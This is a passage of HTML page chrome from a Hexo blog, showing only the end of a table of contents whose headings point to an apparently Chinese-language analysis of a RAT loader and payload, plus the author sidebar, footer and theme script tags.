href="#%E8%84%9A%E6%9C%AC%E6%89%A7%E8%A1%8C%E9%80%BB%E8%BE%91"><span class="nav-number">5.11.</span> <span class="nav-text">脚本执行逻辑</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DownLoad-wMG90xwi"><span class="nav-number">5.12.</span> <span class="nav-text">DownLoad - &#x3D;&#x3D;wMG90xwi&#x3D;&#x3D;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PayLoad%E5%88%86%E6%9E%90"><span class="nav-number">5.13.</span> <span class="nav-text">PayLoad分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Loader-DumpPE01-dll"><span class="nav-number">5.14.</span> <span class="nav-text">Loader- DumpPE01.dll </span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PayLoad-RAT-DumpPE02-exe"><span class="nav-number">5.15.</span> <span class="nav-text">PayLoad-RAT- DumpPE02.exe </span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">49</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">83</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
